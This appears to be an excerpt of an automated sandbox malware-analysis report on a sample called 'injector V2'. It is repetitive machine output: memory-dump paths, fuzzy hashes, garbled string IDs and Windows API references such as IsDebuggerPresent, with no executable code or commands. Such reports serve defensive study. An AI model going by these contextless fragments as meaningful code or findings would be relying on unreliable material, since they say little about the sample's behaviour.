                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: VlUi$WlUi$WlUi$WlUi$WlUi$1I#$1I#$1I#$1I#$U/$U/$U/$U/
                                                                                                                            • API String ID: 0-3233344364
                                                                                                                            • Opcode ID: 7d9c895474c0423a3e128664574922b9dd8e4897013eb72fa4705b5557de1460
                                                                                                                            • Instruction ID: 706946b3042eeaaf5c89fe4d09d534ee24ecbb63f458c933df2e1c3d99713a15
                                                                                                                            • Opcode Fuzzy Hash: 7d9c895474c0423a3e128664574922b9dd8e4897013eb72fa4705b5557de1460
                                                                                                                            • Instruction Fuzzy Hash: 40526F3664C7004F5A6CC62999C812E77D2DBA4320B248AD1EA26CF3F5FF60DF45E642
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: string too long$S@$eIY$eIY$eIY
                                                                                                                            • API String ID: 0-2211027269
                                                                                                                            • Opcode ID: 3a92852118e25de9ca059e9154b1e6d39ea07e4758f4c9a03d05b6ac093ea874
                                                                                                                            • Instruction ID: 71ef1e07bdf05296278c4bce1f8ad97c67ddfe2932e0035b2085d1c06cd188bb
                                                                                                                            • Opcode Fuzzy Hash: 3a92852118e25de9ca059e9154b1e6d39ea07e4758f4c9a03d05b6ac093ea874
                                                                                                                            • Instruction Fuzzy Hash: 4A9149363042218B9E298A2CA9D523D3AD39BE0360F7D89D7E825DF7E4DB35CC458742
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: C`lB$C`lB$C`lB$9z`$9z`$9z`$9z`
                                                                                                                            • API String ID: 0-915920326
                                                                                                                            • Opcode ID: 919b27690586ad3199399c051936a3231d5cbbdf850362b9072eb6b1a48dfaf7
                                                                                                                            • Instruction ID: 2c549c36efc044b2d2fe7fa0d289a286d315f1b5fc0fd172a690d66ce0f81439
                                                                                                                            • Opcode Fuzzy Hash: 919b27690586ad3199399c051936a3231d5cbbdf850362b9072eb6b1a48dfaf7
                                                                                                                            • Instruction Fuzzy Hash: 3781F43A511B109BCA344B28598471E77D2AB90364F368BD6DD22EF7F0CB36DC468B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @\$A\$A\$A\$"!-$"!-$"!-
                                                                                                                            • API String ID: 0-1374745079
                                                                                                                            • Opcode ID: 69ac5aa4550c41e1ba5c5d73d5566c1d209946ed39a2dc1cae421951b56c7645
                                                                                                                            • Instruction ID: f7c5257fc0998ae67df1b368a24a50e81752cfacb1bea5835ec14fc8b69bdb22
                                                                                                                            • Opcode Fuzzy Hash: 69ac5aa4550c41e1ba5c5d73d5566c1d209946ed39a2dc1cae421951b56c7645
                                                                                                                            • Instruction Fuzzy Hash: 507107362047608B4D2C9A2879E953D63C3EBE6371B3986CFD91B8B6E4DF714C815A43
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -'K`$.'K`$.'K`$.'K`$$\Z$$\Z
                                                                                                                            • API String ID: 0-1124325746
                                                                                                                            • Opcode ID: bc79fa3c6b0df019b7fb551830d665087249714335e5df840ff1afbd2a5ed912
                                                                                                                            • Instruction ID: f06505c316897102fbffc14ff019bc58fd962788a82c66e8064d5fc84aa0605d
                                                                                                                            • Opcode Fuzzy Hash: bc79fa3c6b0df019b7fb551830d665087249714335e5df840ff1afbd2a5ed912
                                                                                                                            • Instruction Fuzzy Hash: 74122F76A043108F8B284B2874D46BDB7E2EB55360F7A07DAE912E73E0DA25DD85C781
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ?B;$@B;$@B;$@B;$@B;
                                                                                                                            • API String ID: 0-1209347523
                                                                                                                            • Opcode ID: 94d72e2eb94082fb21df0caaffd0a05bee2b1eab2585fe4fdab0626c1cf3eaf6
                                                                                                                            • Instruction ID: 981705177ae43eac6597735922e7296191ef055ef1ad491c6a5c98f798cb60ad
                                                                                                                            • Opcode Fuzzy Hash: 94d72e2eb94082fb21df0caaffd0a05bee2b1eab2585fe4fdab0626c1cf3eaf6
                                                                                                                            • Instruction Fuzzy Hash: B932073A7147005F4A28CA2899C456FB3E79BD8B34B358786E522CB7F4DB34DE86C641
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CyN$CyN$CyN$CyN$CyN
                                                                                                                            • API String ID: 0-4075027903
                                                                                                                            • Opcode ID: df6a7943b541e0bde5374bb44ada6ffe104fdf6ae21c714f5394701ef89ba81f
                                                                                                                            • Instruction ID: 5bd58dca2d682be4c2be47dca8cc642a36103c55e9b894e82004a9341be50f03
                                                                                                                            • Opcode Fuzzy Hash: df6a7943b541e0bde5374bb44ada6ffe104fdf6ae21c714f5394701ef89ba81f
                                                                                                                            • Instruction Fuzzy Hash: 2812F73A6047004B4A28CB2E56C462E72D29BDA331F758BD6E512CB7F4DB29DD4BC742
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: b~N$c~N$c~N$c~N$c~N
                                                                                                                            • API String ID: 0-1905032987
                                                                                                                            • Opcode ID: e6b4591400721c3c95bc73cfaa475e1206c99089188a1c4181b220de9a9d0da1
                                                                                                                            • Instruction ID: b860ab4937dbb26c7307149c4699e7ab48ac46fd8a371983d54518367a7ad2c1
                                                                                                                            • Opcode Fuzzy Hash: e6b4591400721c3c95bc73cfaa475e1206c99089188a1c4181b220de9a9d0da1
                                                                                                                            • Instruction Fuzzy Hash: 2FA1FA7528C7404B4E288F6C55C422E73E6DBA8320B688AE6DD21CB2D4DF64DF45F646
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: A\$A\$PbQ$"!-$"!-
                                                                                                                            • API String ID: 0-1954403065
                                                                                                                            • Opcode ID: 67841456246173b1c413a1f682e6299e290322b4b7eff75176ed0f21b7518d93
                                                                                                                            • Instruction ID: 86c2b3492af1b99e8ad048e9aff66426349be1ec6e6b931f70a044ce2236062e
                                                                                                                            • Opcode Fuzzy Hash: 67841456246173b1c413a1f682e6299e290322b4b7eff75176ed0f21b7518d93
                                                                                                                            • Instruction Fuzzy Hash: D271D2362047604B4E2C8A2879E453D22C3EFE6331B3986DBD91F9B6E8DA354C815A47
                                                                                                                            APIs
                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFindFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1974802433-0
                                                                                                                            • Opcode ID: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
                                                                                                                            • Instruction ID: 26519f787e9162f85b47a5498e3652c7fc16b181adb8d4893e790f1473ee2040
                                                                                                                            • Opcode Fuzzy Hash: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
                                                                                                                            • Instruction Fuzzy Hash: F971C47190515AAFDF20AF38DC89BBABBF9EB05304F1441E9E449A7211DA358F85AF10
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B496BB
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00B49787
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B497A7
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00B497B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 254469556-0
                                                                                                                            • Opcode ID: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                                                            • Instruction ID: ca03c3964246066d95ffd6abfea1d31a0c15c33ffc1fe09476ad374cbbd18999
                                                                                                                            • Opcode Fuzzy Hash: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                                                            • Instruction Fuzzy Hash: 8C31E4B59453189BDB10EFA4D9897CDBBF8AF18300F1041EAE40DAB250EB719B859F45
                                                                                                                            APIs
                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 00B44D66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4194217158-0
                                                                                                                            • Opcode ID: d1f2018f4cbf707ae15a2092ede6ff12df315ba00a63aed5c012fbbcf6d577df
                                                                                                                            • Instruction ID: 78f63dc66f3ce5f10188f0bccfdd6f5f06ea3ff75bdcbb5fad9fc7ba040643b4
                                                                                                                            • Opcode Fuzzy Hash: d1f2018f4cbf707ae15a2092ede6ff12df315ba00a63aed5c012fbbcf6d577df
                                                                                                                            • Instruction Fuzzy Hash: 27913E3A6147004F5D28DE2869C532D73D29AA53317688EF2E922CB3E9DB24CF55E351
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B4B892
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B4B89C
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00B4B8A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3906539128-0
                                                                                                                            • Opcode ID: 3bd5582810baee16d8f22241fd5c50ebbe2ad62629a571158119ef7d92cc4cfd
                                                                                                                            • Instruction ID: 8edcad0390d972f4f54210c8ed6aad2d6abee0fe3c46f67349142398d94a6b58
                                                                                                                            • Opcode Fuzzy Hash: 3bd5582810baee16d8f22241fd5c50ebbe2ad62629a571158119ef7d92cc4cfd
                                                                                                                            • Instruction Fuzzy Hash: E83192759013299BCB21DF68D989B8DBBF8EF18310F5041EAE41CA7290EB709F859F45
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: dUb$ dUb$ dUb
                                                                                                                            • API String ID: 0-1696577624
                                                                                                                            • Opcode ID: c99ae8837af4524e64abca57c619fc93d1b4092d6294c319d914a32cd4bface6
                                                                                                                            • Instruction ID: 31599825eb04c8fb21ccf7a0dadf86fd38b69347395dc12731e487b281d858be
                                                                                                                            • Opcode Fuzzy Hash: c99ae8837af4524e64abca57c619fc93d1b4092d6294c319d914a32cd4bface6
                                                                                                                            • Instruction Fuzzy Hash: 82D15A3DD04308475A2CEF2C96C517D72D3D7D4370F284ADAD8264BBE4E6628FC9A646
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Mnj$Mnj$Mnj
                                                                                                                            • API String ID: 0-3324928681
                                                                                                                            • Opcode ID: 78bc169696fd6d201b59724774710c426360b8faa166af8e2b62c270681c7e1b
                                                                                                                            • Instruction ID: 1f1de767dc7bf1a3e0750c4128b440b588de0039c66fb7460bcf03f5ec6494c5
                                                                                                                            • Opcode Fuzzy Hash: 78bc169696fd6d201b59724774710c426360b8faa166af8e2b62c270681c7e1b
                                                                                                                            • Instruction Fuzzy Hash: 1ED14C75205714CB993CC628E8C912D72D3EB98321F780FE6E467CB3A1DB29ED419653
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .Q_$i.^$j.^
                                                                                                                            • API String ID: 0-3437208586
                                                                                                                            • Opcode ID: c3492964beccc3518d56c428bc9a6d0ae9cd5c824e2224b1afb55c1831dd33bb
                                                                                                                            • Instruction ID: 9d305f997e44cba9b02ac97b077cd1e02c5da8e75baf5a9c7424bddc9e4d9d30
                                                                                                                            • Opcode Fuzzy Hash: c3492964beccc3518d56c428bc9a6d0ae9cd5c824e2224b1afb55c1831dd33bb
                                                                                                                            • Instruction Fuzzy Hash: 988127752083018B9A3C96245CE463DF3C6EFA5361FB956D9F913DBAA0DE218D458383
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F- $XvIL$jiX
                                                                                                                            • API String ID: 0-1826392768
                                                                                                                            • Opcode ID: 41ffabec1f88bd75c088f5dc72d15f01631fb4986d2928510cadcbfca815ff7f
                                                                                                                            • Instruction ID: bfb470c0d9b2d7af71fd3bb0bab76bcfcb6ef9fb122c2a40f053b395bff50c89
                                                                                                                            • Opcode Fuzzy Hash: 41ffabec1f88bd75c088f5dc72d15f01631fb4986d2928510cadcbfca815ff7f
                                                                                                                            • Instruction Fuzzy Hash: 03619E316517255BAE2C9A28B8E963C7ED1DF54361B7542FEF41F57AF0CA20AC8086C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
